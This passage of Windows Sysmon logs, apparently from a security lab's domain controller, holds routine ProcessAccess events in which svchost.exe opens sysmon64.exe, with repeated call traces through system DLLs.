\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3451,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.414\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.414","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3452,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.414\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.414","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3453,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.414\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.414","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3454,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.414\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.414","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3455,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.414\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.414","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3456,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.414\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.414","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3457,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.414\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.414","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3458,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.414\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.414","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
